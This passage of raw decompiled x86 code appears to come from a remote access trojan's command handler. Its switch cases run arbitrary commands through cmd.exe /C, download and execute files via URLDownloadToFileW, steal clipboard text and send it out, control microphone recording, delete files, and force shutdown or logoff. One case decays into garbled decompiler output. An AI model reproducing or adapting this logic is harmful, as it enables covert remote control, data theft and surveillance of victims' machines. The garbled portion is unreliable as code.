				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v452;
				char _v500;
				char _v504;
				void* __esi;
				void* _t244;
				void* _t246;
				intOrPtr _t374;
				intOrPtr _t375;
				void* _t376;
				void* _t378;
				signed int _t379;
				signed int _t385;
				void* _t388;
				void* _t389;
				void* _t390;
				void* _t394;
				void* _t400;

				_t399 = __eflags;
				_t360 = __edx;
				_t294 = __ebx;
				_push(__ebx);
				_t374 = _a4;
				E004020EC(__ebx,  &_v308, __edx, __eflags, _t374 + 0x1c);
				SetEvent( *(_t374 + 0x34));
				_t375 =  *((intOrPtr*)(L00401F95( &_v312)));
				E004042A6( &_v312,  &_v288, 4, 0xffffffff);
				_t388 = (_t385 & 0xfffffff8) - 0x18c;
				E004020EC(__ebx, _t388, _t360, _t399, 0x46c238);
				_t389 = _t388 - 0x18;
				E004020EC(__ebx, _t389, _t360, _t399,  &_v304);
				E00417478( &_v444, _t360);
				_t390 = _t389 + 0x30;
				_t400 = _t375 - 0x8f;
				if(_t400 > 0) {
					_t376 = _t375 + 0xffffff70;
					__eflags = _t376 - 0x22;
					if(__eflags <= 0) {
						switch( *((intOrPtr*)(( *(_t376 + 0x413511) & 0x000000ff) * 4 +  &M004134C5))) {
							case 0:
								__ecx =  &_v420;
								__ecx = L00401E49( &_v420, __edx, __eflags, 0);
								__eax = L00401F95(__ecx);
								__ecx = __eax;
								__eax = L00407F83(__ecx);
								goto L120;
							case 1:
								__ecx =  &_v420;
								__ecx = L00401E49( &_v420, __edx, __eflags, 0);
								__eax = L00401F95(__eax);
								__eax = StrToIntA(__eax);
								__ecx =  &_v424;
								__edi = __eax;
								__ecx = L00401E49( &_v424, __edx, __eflags, 1);
								__eax = L00401F95(__eax);
								__dl = 0x30;
								__ecx =  &_v408;
								__eax = E0041805B( &_v408, __edx, __eax);
								__ecx =  &_v408;
								__eax = L00401EEB( &_v408);
								__ecx =  &_v428;
								__esi = __eax;
								__eax = L00401E49( &_v428, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx = __esi;
								__eax = L00417A4E(__esi);
								__esp = __esp + 0x18;
								__ecx =  &_v416;
								__edx = L00401EEB( &_v416);
								__ecx = __edi;
								__eax = L00417F10(__edi, __edx);
								goto L100;
							case 2:
								__ecx =  &_v420;
								__ecx = L00401E49( &_v420, __edx, __eflags, 1);
								__eax = L00401F95(__eax);
								__ecx =  &_v424;
								__ecx = L00401E49( &_v424, __edx, __eflags, 0);
								__eax = L00401F95(__ecx);
								__eax = SetWindowTextW(__eax, __eax);
								goto L20;
							case 3:
								__ecx =  &_v420;
								__eax = L00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00413545(__ebx, __edx);
								goto L97;
							case 4:
								__ecx =  &_v420;
								__eax = L00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = L00413673(__ecx, __eflags);
								goto L97;
							case 5:
								E004020EC(__ebx, _t390 - 0x18, _t360, __eflags, L00401E49( &_v420, _t360, __eflags, 0));
								L0040691F(_t360);
								goto L97;
							case 6:
								__ecx =  &_v420;
								__eax = L00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00415397(__edx);
								goto L97;
							case 7:
								__ecx =  &_v420;
								__eax = L00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00404013(__edx);
								goto L97;
							case 8:
								__eax = L0041667F(__ebx);
								goto L120;
							case 9:
								__eax = L004167AD(__ebx, __eflags);
								goto L120;
							case 0xa:
								__eax = L004167EA(__eax);
								goto L120;
							case 0xb:
								__ebx = 0;
								__ecx =  &_v420;
								__ecx = L00401E49( &_v420, __edx, __eflags, 0);
								__eax = E00405220(0);
								__ecx =  &_v428;
								__eflags =  *__eax - __bl;
								__ebx = 0 | __eflags != 0x00000000;
								__eax = L00401E49( &_v428, __edx, __eflags, 1);
								__dl = __bl;
								__ecx = __eax;
								__eax = L0041678C(__ecx, __edx, __edi, __esi);
								goto L120;
							case 0xc:
								__eax = L004167F2(__edx);
								goto L120;
							case 0xd:
								__eax = L00405F77(__ebx, __ecx, __edx);
								__ecx =  &_v420;
								__esi = __eax;
								__eax = L00401E49( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx =  &_v340;
								__edi = __esp;
								__edx = __esi;
								__edx = E00417226(__ebx,  &_v340, __esi);
								__ecx =  &_v372;
								__edx = __eax;
								__ecx = __edi;
								__eax = L00402F93(__ebx, __edi, __edx, __eflags, __eax);
								_push(0xab);
								goto L119;
							case 0xe:
								__eflags =  *0x46bb03;
								if( *0x46bb03 != 0) {
									ShowWindow( *0x46bebc, 9) = SetForegroundWindow( *0x46bebc);
								} else {
									__cl = 1;
									__eax = L00418F59(__ebx, __ecx, __edx);
									__ebx = 0;
									__eax = CreateThread(0, 0,  &M00418D28, 0, 0, 0);
									 *0x46bb03 = 2;
								}
								goto L120;
							case 0xf:
								_push(5);
								goto L16;
							case 0x10:
								__ebx = 0;
								_push(0);
								_push(0);
								goto L17;
							case 0x11:
								__ecx =  &_v116;
								__eax = E004072F6( &_v116);
								__ecx =  &_v420;
								__eax = L00401E49( &_v420, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v428;
								__eax = L00401E49( &_v428, __edx, __eflags, 1);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v436;
								__eax = L00401E49( &_v436, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v140;
								__eax = L00405BD3( &_v140, __edx);
								__ecx =  &_v212;
								__eax = L00407304(__ebx, __ecx, __esi);
								goto L120;
							case 0x12:
								goto L120;
						}
					}
					goto L120;
				} else {
					if(_t400 == 0) {
						L124();
						_v348 = L00436769(_t237, L00401F95(L00401E49( &_v420, _t360, __eflags, 2)));
						_v344 =  &_v120;
						L004139B3(__ebx, _t360, 0x46c238, __eflags,  &_v348);
						_t120 = E0040805A() - 1; // -1
						_t378 = _t120;
						_t244 = L00401E49( &_v428, _t360, __eflags, 3);
						_t394 = _t390 - 0x18;
						E004020EC(_t294, _t394, _t360, __eflags, _t244);
						_t246 = L00401E49( &_v436, _t360, __eflags, 2);
						E004020EC(_t294, _t394 - 0x18, _t360, __eflags, _t246);
						E0040427F(_t294, _t394, L00401F95(L00401E49( &_v444, _t360, __eflags, 1)));
						E0040427F(_t294, _t394 - 0xffffffffffffffe8, L00401F95(L00401E49( &_v452, _t360, __eflags, 0)));
						L004077EC( &_v156, _t360, __eflags);
						__eflags = _v252;
						if(_v252 == 0) {
							E00408007( &_v420,  *((intOrPtr*)(L00407FE6(E0040806E( &_v156,  &_v504),  &_v500, _t378))));
						}
						L00407FDE(_t294,  &_v212, _t378);
						goto L120;
					} else {
						_t379 = _t375 - 1;
						if(_t379 > 0x33) {
							L120:
							_t163 =  &_v420; // 0x404538
							L00401E74(_t163, _t360);
							L00401FC7();
							L00401FC7();
							return 0;
						} else {
							switch( *((intOrPtr*)(_t379 * 4 +  &M004133F5))) {
								case 0:
									_t263 = E00417226(0,  &_v368, GetTickCount());
									_t265 = E00417226(0,  &_v336, E004171D6( &_v368));
									_t267 = E0041739C(0,  &_v164, E0041719C( &_v140));
									_t369 = L00402F93(0,  &_v404, L00402F1D( &_v264, L00402F93(0,  &_v240, L00402F1D( &_v216, L00402FB7( &_v192, L00401E49( &_v420, _t266, _t401, 0), 0x46c238), _t267), _t401, 0x46c238), _t265), _t401, 0x46c238);
									L00402F1D(_t390 - 0x18, _t273, _t263);
									_push(0x4c);
									L00404AA4(0, 0x46c780, _t273, _t401);
									L00401FC7();
									L00401FC7();
									L00401FC7();
									L00401FC7();
									L00401FC7();
									L00401FC7();
									L00401EF0();
									L00401FC7();
									L00401FC7();
									_t287 = L00436769(_t285, L00401F95(L00401E49( &_v452, _t273, _t401, 1)));
									if(_t287 == 0) {
										L00401E49( &_v440, _t369, __eflags, 0);
										_t360 = "0";
										_t289 = L00405A6F("0");
										__eflags = _t289;
										if(_t289 != 0) {
											_push(0);
											_t358 = 0x46c780;
											goto L10;
										}
									} else {
										_t360 = _t287 + _t287;
										if(L0040484A(0x46c780) == 0) {
											L00404E9A(0x46c780, _t360, 1);
										} else {
											L00404FAD(0x46c238, _t360);
										}
									}
									goto L120;
								case 1:
									_push(0);
									__ecx = 0x46c780;
									L10:
									E0040511B(_t358, 0x46c238);
									goto L120;
								case 2:
									__ecx =  &_v368;
									__eax = L00417C05(__ebx,  &_v368);
									__esp = __esp - 0x18;
									__edx = __eax;
									__ecx = __esp;
									__eax = E0041739C(__ebx, __esp, __edx);
									_push(0x33);
									__ecx = 0x46c780;
									__eax = L00404AA4(__ebx, 0x46c780, __edx, __eflags);
									__ecx =  &_v396;
									goto L101;
								case 3:
									goto L120;
								case 4:
									 &_v376 = GetCurrentProcessId();
									__eax = L0043BACE(__ecx, __eax,  &_v376, 0xa);
									__esp = __esp - 0xc;
									__eax =  &_v376;
									__esi = __esp;
									__ecx =  &_v336;
									__edx = E0040D211(__ebx,  &_v336, __eflags);
									__ecx =  &_v368;
									__edx = __eax;
									__ecx = __esi;
									__eax = E00405343(__ebx, __esi, __edx, __edi, __eflags,  &_v376);
									_push(0x4f);
									L119:
									__ecx = 0x46c780;
									__eax = L00404AA4(__ebx, 0x46c780, __edx, __eflags);
									__ecx =  &_v396;
									__eax = L00401FC7();
									__ecx =  &_v364;
									__eax = L00401FC7();
									goto L120;
								case 5:
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__ecx);
									__ecx = __eax;
									__eax = E004171F9(__ecx);
									goto L120;
								case 6:
									L20:
									__eax = L00413909(__edx);
									goto L120;
								case 7:
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__ecx);
									__eax = CloseWindow(__eax);
									goto L120;
								case 8:
									_push(3);
									goto L16;
								case 9:
									_push(9);
									L16:
									_push(0);
									L17:
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags);
									__eax = L00401F95(__ecx);
									__eax = ShowWindow(__eax, ??);
									goto L120;
								case 0xa:
									__eax =  &_v372;
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__ecx);
									__eax = GetWindowThreadProcessId(__eax,  &_v372);
									__ecx = _v376;
									__eax = E004171F9(_v376);
									goto L20;
								case 0xb:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__eax);
									__ecx =  &_v340;
									__eax = E0040427F(0,  &_v340, __eax);
									__edx = L"/C ";
									__ecx =  &_v376;
									__ecx = __eax;
									__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
									__ecx =  &_v376;
									__eax = L00401EF0();
									__ecx =  &_v344;
									goto L101;
								case 0xc:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 1);
									__ecx = 0x46c2d0;
									__eax = L00401FAD(0x46c2d0, __eax);
									__eflags =  *0x46bae3 - __bl;
									if(__eflags == 0) {
										__ecx =  &_v420;
										__eax = L00401E49( &_v420, __edx, __eflags, 0);
										__esp = __esp - 0x18;
										__ecx = __esp;
										__eax = L004055EA();
										goto L97;
									}
									goto L120;
								case 0xd:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									L00401F95(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
									goto L120;
								case 0xe:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c868;
									__eax = L00401FAD(0x46c868, __eax);
									__ecx =  &_v428;
									__ecx = L00401E49( &_v428, __edx, __eflags, 3);
									__eax = L00401F95(__ecx);
									__esi = __eax;
									__eax = L0041451F(__edx, __edi, __eax);
									__ecx =  &_v432;
									__ecx = L00401E49( &_v432, __edx, __eflags, 2);
									__eax = L00401F95(__ecx);
									__eax = L00436769(__ecx, __eax);
									__eflags = __eax;
									__ecx =  &_v436;
									_t57 = __eax != 0;
									__eflags = _t57;
									__ebx = 0 | _t57;
									__ecx = L00401E49( &_v436, __edx, _t57, 1);
									L00401F95(__ecx) = L00436769(__ecx, __eax);
									__dl = __bl;
									__cl = __al;
									__eax = L0041459C(__ecx, __edx, __eflags, __esi);
									goto L26;
								case 0xf:
									 *0x46bd6a = 1;
									goto L120;
								case 0x10:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x46c350;
									__eax = E0040857D(0x46c350, __edx);
									goto L120;
								case 0x11:
									__ecx = 0x46c350;
									__eax = E004093AD(0x46c350);
									goto L120;
								case 0x12:
									__ecx = 0x46c350;
									__eax = L0040951E(__ebx, 0x46c350);
									goto L120;
								case 0x13:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c3e0;
									__eax = L00401FAD(0x46c3e0, __eax);
									__ecx = 0x46c350;
									goto L32;
								case 0x14:
									 *0x46bd6c =  *0x46bd6c + 1;
									__eflags =  *0x46bd6c;
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x46c350;
									__eax = L00408FF0(0x46c350, __edx);
									goto L34;
								case 0x15:
									__esi = 0x46c350;
									__ecx = 0x46c350;
									__eax = L00409D36(0x46c350);
									__ecx = 0x46c350;
									L32:
									__eax = L00408E9E(__ebx, __ecx);
									goto L120;
								case 0x16:
									__eflags =  *0x46baf9 - __bl;
									if( *0x46baf9 == __bl) {
										__edx = 0;
										__cl = 0;
										__eax = L0040A679(0);
									}
									goto L120;
								case 0x17:
									__ebx = 0;
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c1b8;
									__eax = L00401FAD(0x46c1b8, __eax);
									__ecx = 0x46c1d0;
									__eax = E0040498B(0x46c1d0);
									__esp = __esp - 0x10;
									__esi = 0x46bacc;
									__edi = __esp;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi = 0x46c1d0;
									__ecx = 0x46c1d0;
									__eax = E00404A08(__edx);
									__esp = __esp - 0x18;
									__ecx = __esp;
									_push(0x46c1b8);
									__eflags =  *0x46baaa - __bl;
									if(__eflags == 0) {
										__eax = E004020EC(0, __ecx, __edx, __eflags);
									} else {
										__eax = E004020EC(0, __ecx, __edx, __eflags);
									}
									__ecx = __esi;
									__eax = L00404AA4(__ebx, __esi, __edx, __eflags);
									__ecx = __esi;
									__eax = L00404BBE(__ecx, __edx, 0x404538, __ebx);
									goto L120;
								case 0x18:
									__eax =  *0x46bac0();
									__ecx = 0x46c1d0;
									__eax = L00404E0B(0x46c1d0);
									goto L120;
								case 0x19:
									__ebx = 0;
									__ecx =  &_v420;
									 *0x46ba74 = __bl;
									__eax = L00401E49( &_v420, __edx, __eflags, 3);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(0, __esp, __edx, __eflags, __eax);
									__ecx =  &_v428;
									__ecx = L00401E49( &_v428, __edx, __eflags, 2);
									__eax = L00401F95(__ecx);
									_push(__eax);
									__ecx =  &_v432;
									__ecx = L00401E49( &_v432, __edx, __eflags, 1);
									__eax = L00401F95(__ecx);
									__eax = L00436769(__ecx, __eax);
									__ecx =  &_v436;
									__esi = __eax;
									__ecx = L00401E49( &_v436, __edx, __eflags, 0);
									__eax = L00401F95(__ecx);
									__eax = L00436769(__ecx, __eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = L004016F8(__ecx, __edx, __edi, __esi);
									goto L120;
								case 0x1a:
									 *0x46ba74 = 1;
									waveInStop( *0x46bab8) = waveInClose( *0x46bab8);
									goto L120;
								case 0x1b:
									 *0x46bd6c =  *0x46bd6c + 1;
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 1);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx =  &_v428;
									__eax = L00401E49( &_v428, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00410188(__edx);
									__esp = __esp + 0x30;
									L34:
									 *0x46bd6c =  *0x46bd6c - 1;
									goto L120;
								case 0x1c:
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									L00401F95(__ecx) = DeleteFileW(__eax);
									goto L120;
								case 0x1d:
									__eax = E0041015B();
									ExitProcess(0);
									goto L46;
								case 0x1e:
									L47:
									__eflags =  *0x46bd6c - __ebx;
									if( *0x46bd6c != __ebx) {
										L46:
										Sleep(0x64);
										goto L47;
									}
									__eax = L0040AD84();
									_pop(__ebx);
									__al = __al & 0x00000041;
									__cl = __cl + __ah;
									__eax = __eax & 0x2f500041;
									__ecx = __ecx + 1;
									__ah = __ah + __al;
									__eax = __eax ^  *__ecx;
									asm("les esi, [ebx]");
									__ecx = __ecx + 1;
									__dl = __dl + __ch;
									__eax = __eax & 0x262e0041;
									__ecx = __ecx + 1;
									__cl = __cl + __dl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ebx + 0x26)) =  *((intOrPtr*)(__ebx + 0x26)) + __dl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x26)) =  *((intOrPtr*)(__eax + 0x26)) + __bh;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi - 0x5cffbeda)) =  *((intOrPtr*)(__edi - 0x5cffbeda)) + __bl;
									__ecx = __ecx + 1;
									__bl = __bl + __bl;
									__ecx = __ecx + 1;
									 *0x77004127 =  *0x77004127 + __dh;
									asm("daa");
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x1d004127)) =  *((intOrPtr*)(__eax + 0x1d004127)) + __ah;
									 *__ecx =  *__ecx - __al;
									 *__eax =  *__eax - __ebp;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__esi + 0x28)) =  *((intOrPtr*)(__esi + 0x28)) + __cl;
									__ecx = __ecx + 1;
									_a36 = _a36 + __bl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax +  &_a61)) =  *((intOrPtr*)(__eax +  &_a61)) + __ch;
									 *((intOrPtr*)(__ecx - 0x3dffbed8)) =  *((intOrPtr*)(__ecx - 0x3dffbed8)) + __dl;
									 *__ecx =  *__ecx - __al;
									0x4133();
									__ah = __ah + __al;
									__eax = __eax ^  *__ecx;
									 *__eax =  *__eax >> __cl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x29)) =  *((intOrPtr*)(__eax + 0x29)) + __cl;
									__ecx = __ecx + 1;
									_a37 = _a37 + __bl;
									__ecx = __ecx + 1;
									__cl = __cl + __bl;
									 *__ecx =  *__ecx - __eax;
									asm("std");
									 *__ecx =  *__ecx - __eax;
									__eflags = __al - 0x2a;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edx + 0x2a)) =  *((intOrPtr*)(__edx + 0x2a)) + __bl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi + 0x2a)) =  *((intOrPtr*)(__edi + 0x2a)) + __ch;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edx +  &_a61)) =  *((intOrPtr*)(__edx +  &_a61)) + __bh;
									 *((intOrPtr*)(__esi + 0x1c00412a)) =  *((intOrPtr*)(__esi + 0x1c00412a)) + __cl;
									__eax = __eax -  *__ecx;
									asm("invalid");
									__ecx = __ecx + 1;
									__cl = __cl + __ah;
									__eax = __eax -  *__ecx;
									 *0x2cee0041 = __ch;
									__ecx = __ecx + 1;
									_a41 = _a41 + __ch;
									__ecx = __ecx + 1;
									__dl = __dl + __ch;
									__eax = __eax - 0x2e1e0041;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__esi + 0x2e)) =  *((intOrPtr*)(__esi + 0x2e)) + __ch;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x2e)) =  *((intOrPtr*)(__eax + 0x2e)) + __bh;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax - 0x47ffbed2)) =  *((intOrPtr*)(__eax - 0x47ffbed2)) + __bl;
									__ecx = __ecx + 1;
									__al = __al + __bl;
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __dh;
									asm("das");
									__ecx = __ecx + 1;
									__ah = __ah + __al;
									__eax = __eax ^  *__ecx;
									__eflags = __eax;
									if(__eax == 0) {
										__ecx = __ecx + 1;
										__ch = __ch + __ch;
										 *__ecx =  *__ecx ^ __al;
										asm("adc dh, [ecx]");
										__ecx = __ecx + 1;
										 *__edx =  *__edx + __dl;
										__al = __al ^  *__ecx;
										__dh =  *__edx;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__edx - 0x35ffbece)) =  *((intOrPtr*)(__edx - 0x35ffbece)) + __ch;
										 *__ecx =  *__ecx ^ __al;
										__edx = __edx - 1;
										__al = __al ^  *__ecx;
										_push(0x32);
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__eax + 0x33)) =  *((intOrPtr*)(__eax + 0x33)) + __dl;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__edi + 0x33)) =  *((intOrPtr*)(__edi + 0x33)) + __dl;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__esi + 0x33)) =  *((intOrPtr*)(__esi + 0x33)) + __bl;
										__ecx = __ecx + 1;
										 *__ecx =  *__ecx + __ah;
										__eflags =  *__ecx;
									}
									__eax = __eax ^  *__ecx;
									asm("retf 0x4132");
									_a47 = _a47 + __ah;
									__ecx = __ecx + 1;
									__ah = __ah + __dl;
									__al = __al ^  *__ecx;
									__dh = __dh +  *__edx;
									__ecx = __ecx + 1;
									 *__ecx =  *__ecx + __cl;
									__al = __al ^  *__ecx;
									_t216 = __eax;
									__eax = __edi;
									__edi = _t216;
									 *__ecx =  *__ecx ^ __eax;
									asm("les esi, [ebx]");
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __al;
									asm("adc al, [ecx]");
									asm("adc al, [edx]");
									__edx = __edx +  *__edx;
									__al = __al + 5;
									_push(es);
									_pop(es);
									asm("adc dl, [edx]");
									asm("adc cl, [eax]");
									 *__edx =  *__edx | __ecx;
									asm("adc cl, [ebx]");
									__al = __al | 0x00000012;
									asm("adc dl, [edx]");
									asm("adc dl, [edx]");
									asm("adc dl, [edx]");
									__eax = __eax | 0x12100f0e;
									asm("adc dl, [edx]");
									asm("adc [esi-0x75], edx");
									_push(__esi);
									__esi = __ecx;
									__ecx = __esi + 4;
									L0040484E(__ebx, __esi + 4, 0) = __esi;
									_pop(__esi);
									return __esi;
									goto L125;
								case 0x1f:
									__eax = E0040B488(__ebx, __eflags);
									goto L120;
								case 0x20:
									while(1) {
										__eflags =  *0x46bd6c - __ebx;
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__eax);
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = L00401E49( &_v424, __edx, __eflags, 1);
									__eax = L00401F95(__eax);
									__dl =  *__esi;
									__ecx =  &_v408;
									__eax = E0041805B( &_v408, __edx, __eax);
									_push(0);
									_push(0);
									__ecx =  &_v408;
									_push(L00401EEB( &_v408));
									__ecx =  &_v428;
									__ecx = L00401E49( &_v428, __edx, __eflags, 2);
									__eax = L00401F95(__eax);
									_push(__eax);
									_push(0);
									__imp__URLDownloadToFileW();
									__eflags = __eax;
									if(__eflags == 0) {
										goto L53;
									}
									goto L100;
								case 0x21:
									while(1) {
										__eflags =  *0x46bd6c - __ebx;
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__eax);
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = L00401E49( &_v424, __edx, __eflags, 1);
									__eax = L00401F95(__eax);
									__dl =  *__esi;
									__ecx =  &_v408;
									__eax = E0041805B( &_v408, __edx, __eax);
									__ecx =  &_v408;
									__eax = L00401EEB( &_v408);
									__ecx =  &_v428;
									__esi = __eax;
									__eax = L00401E49( &_v428, __edx, __eflags, 2);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020EC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = __esi;
									__eax = L00417A4E(__esi);
									__esp = __esp + 0x18;
									__eflags = __al;
									if(__eflags != 0) {
										L53:
										__esp = __esp - 0x18;
										__eax =  &_v420;
										__ecx = __esp;
										E00407350(__ebx, __esp, __edx, __eflags,  &_v420) = E0040B0E2();
										__esp = __esp + 0x18;
									}
									goto L100;
								case 0x22:
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 2);
									__eax = L00401F95(__ecx);
									__eax = __eax + 0x10000;
									__ecx =  &_v424;
									__ecx = L00401E49( &_v424, __edx, __eflags, 1);
									__eax = L00401F95(__eax);
									__ebx = 0;
									__ecx =  &_v428;
									__ecx = L00401E49( &_v428, __edx, __eflags, 0);
									L00401F95(__ecx) = MessageBoxW(0, __eax, __eax, __eax);
									goto L120;
								case 0x23:
									__eax = L00413958();
									__ebx = 0;
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__edx = "0";
									__ecx = __eax;
									__eax = L00405A6F(__edx);
									__ecx =  &_v424;
									_push(0);
									__eflags = __al;
									if(__eflags == 0) {
										__eax = L00401E49( &_v424, __edx, __eflags);
										__edx = "1";
										__ecx = __eax;
										__eax = L00405A6F(__edx);
										__ecx =  &_v424;
										_push(0);
										__eflags = __al;
										if(__eflags == 0) {
											__eax = L00401E49( &_v424, __edx, __eflags);
											__edx = "2";
											__ecx = __eax;
											__eax = L00405A6F(__edx);
											__eflags = __al;
											if(__eflags == 0) {
												__eax = LoadLibraryA("PowrProf.dll");
												__eax = GetProcAddress(__eax, "SetSuspendState");
												__ecx =  &_v420;
												__esi = __eax;
												__eax = L00401E49( &_v420, __edx, __eflags, 0);
												__edx = "3";
												__ecx = __eax;
												__eax = L00405A6F(__edx);
												_push(0);
												__eflags = __al;
												if(__eflags == 0) {
													__ecx =  &_v420;
													__eax = L00401E49( &_v420, __edx, __eflags);
													__edx = "4";
													__ecx = __eax;
													__eax = L00405A6F(__edx);
													__eflags = __al;
													if(__al != 0) {
														_push(0);
														_push(0);
														_push(1);
														goto L70;
													}
												} else {
													_push(0);
													_push(0);
													L70:
													__eax =  *__esi();
												}
											} else {
												_push(0);
												__ecx =  &_v420;
												__ecx = L00401E49( &_v420, __edx, __eflags, 1);
												__eax = L00401F95(__ecx);
												__eax = L00436769(__ecx, __eax);
												__eax = __eax | 0x00000002;
												__eflags = __eax;
												goto L65;
											}
										} else {
											__ecx = L00401E49( &_v424, __edx, __eflags, 1);
											__eax = L00401F95(__ecx);
											__eax = L00436769(__ecx, __eax);
											__eax = __eax | 0x00000001;
											goto L65;
										}
									} else {
										__ecx = L00401E49( &_v424, __edx, __eflags, 1);
										__eax = L00401F95(__ecx);
										__eax = L00436769(__ecx, __eax);
										L65:
										_pop(__ecx);
										__eax = ExitWindowsEx(__eax, ??);
									}
									goto L120;
								case 0x24:
									L76:
									__eax = OpenClipboard(__ebx);
									__eflags = __eax;
									if(__eax != 0) {
										__esi = GetClipboardData(0xd);
										__edi = GlobalLock(__esi);
										GlobalUnlock(__esi) = CloseClipboard();
										__eflags = __edi;
										0x45f724 =  !=  ? __edi : 0x45f724;
										__ecx =  &_v400;
										__eax = E0040427F(__ebx,  &_v400,  !=  ? __edi : 0x45f724);
										__esp = __esp - 0x18;
										__edx =  &_v404;
										__ecx = __esp;
										__eax = E0041739C(__ebx, __esp, __edx);
										_push(0x6b);
										__ecx = 0x46c780;
										__eax = L00404AA4(__ebx, 0x46c780, __edx, __eflags);
										L100:
										__ecx =  &_v400;
										L101:
										__eax = L00401EF0();
									}
									goto L120;
								case 0x25:
									__eflags = OpenClipboard(0);
									if(__eflags != 0) {
										__eax = EmptyClipboard();
										__ecx =  &_v420;
										__ecx = L00401E49( &_v420, __edx, __eflags, 0);
										__eax = E00402489();
										__eax = __eax + 2;
										__edi = __eax;
										__eax = GlobalLock(__edi);
										__ecx =  &_v424;
										__esi = __eax;
										__ecx = L00401E49( &_v424, __edx, __eflags, 0);
										__eax = E00402489();
										__ecx =  &_v428;
										__ecx = L00401E49( &_v428, __edx, __eflags, 0);
										GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
										goto L75;
									}
									goto L120;
								case 0x26:
									__eax = OpenClipboard(0);
									__eflags = __eax;
									if(__eax != 0) {
										__eax = EmptyClipboard();
										L75:
										__eax = CloseClipboard();
										goto L76;
									}
									goto L120;
								case 0x27:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = E00402489();
									__ecx =  &_v424;
									__esi = __eax;
